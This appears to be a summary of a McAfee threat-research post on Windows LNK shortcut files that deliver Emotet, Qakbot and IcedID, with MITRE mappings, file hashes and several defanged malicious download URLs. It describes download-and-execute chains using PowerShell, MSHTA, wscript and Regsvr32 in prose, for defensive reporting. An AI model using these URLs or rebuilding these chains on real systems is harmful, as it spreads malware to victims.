Threat Research

Rise of LNK (Shortcut files) Malware | McAfee Blog

McAfee

McAfee Labs reports a rise in malware delivered via Windows LNK shortcut files, targeting users with Emotet, Qakbot, and IcedID. The article explains how attackers abuse LNKs with PowerShell, CMD, MSHTA, and other tools to download and execute payloads after a phishing-like delivery. #Emotet #Qakbot #IcedID #LNK #PowerShell #MSHTA #Regsvr32

Keypoints

  • Windows LNK shortcut files are increasingly used to deliver malware (Emotet, Qakbot, IcedID).
  • Attackers distribute LNKs via email spam and malicious URLs, enticing victims to open them.
  • Emotet infection chain involves LNK invoking cmd.exe, extracting and executing a VBS payload, then downloading via wscript.exe and executing with Regsvr32.
  • IcedID uses highly obfuscated PowerShell parameters that are decrypted at runtime and chained with MSHTA to fetch an installer.
  • Qakbot demonstrates hardcoded PowerShell commands that download a DLL via Invoke-WebRequest and run it with rundll32.
  • Across campaigns, attackers pair LNKs with PowerShell, CMD, MSHTA, and similar tools to download and execute payloads.
  • IOC details include specific SHA-256 hashes for Emotet/IcedID/Qakbot LNKs and several malicious URLs.

MITRE Techniques

  • [T1566.001] Phishing: Attachment – “Threat actors are using email spam and malicious URLs to deliver LNK files to victims.”
  • [T1059.001] PowerShell – “Here, PowerShell LNK has a highly obfuscated parameter … The whole obfuscated argument is decrypted at run-time and then executes MSHTA …”
  • [T1059.003] Windows Command Shell – “LNK invokes the Windows Command Processor (cmd.exe). The target path … is only visible to 255 characters. However, command-line arguments can be up to 4096…”
  • [T1059.005] Windows Script Host – “Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.”
  • [T1218.005] Mshta – “PowerShell, CMD, and MSHTA to download malicious files.”
  • [T1105] Ingress Tool Transfer – “download the main Emotet 64-bit DLL payload”
  • [T1027] Obfuscated/Compressed Files and Information – “The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time.”
  • [T1218.011] Signed Binary Proxy Execution: Regsvr32 – “The downloaded DLL is then finally executed using the REGSVR32.EXE utility”

Indicators of Compromise

  • [SHA-256] Emotet LNK – 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71
  • [SHA-256] IcedID LNK – 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9
  • [SHA-256] Qakbot LNK – b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172
  • [URLs] C2/malicious hosts – https://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/, hxxps://hectorcalle[.]com/093789.hta, hxxps://hectorcalle[.]com/listbul.exe, hxxps://green-a-thon[.]com/LosZkUvr/B.png (and 4 more URLs)

Read more: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/